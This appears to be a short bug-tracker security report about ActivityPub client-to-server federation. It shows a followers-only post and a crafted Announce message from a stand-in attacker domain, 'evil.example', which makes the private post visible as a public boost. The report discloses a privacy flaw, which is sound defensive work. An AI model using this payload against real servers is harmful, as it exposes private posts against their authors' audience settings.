[1.x] ActivityPub C2S can be used to unmask private posts across domain boundaries
Consider the following ActivityStreams object:
{
"@context": "https://www.w3.org/ns/activitystreams",
"to": ["https://chatty.example/~karen/followers"],
"cc": [],
"id": "https://chatty.example/~karen/object/1234",
"content": "<p>Wow!</p>",
"attributedTo": "https://chatty.example/~karen"
}
Consider the following ActivityPub message submitted via C2S:
{
"@context": "https://www.w3.org/ns/activitystreams",
"to": ["https://www.w3.org/ns/activitystreams#Public"],
"cc": ["https://evil.example/users/kevin"],
"actor": "https://evil.example/users/kevin",
"id": "https://evil.example/activity/12345678-1234-5678-9012-123456789012",
"type": "Announce",
"object": "https://chatty.example/~karen/object/1234"
}
Kevin then checks his timeline and sees a boost containing Karen's object.
Edited by kaniini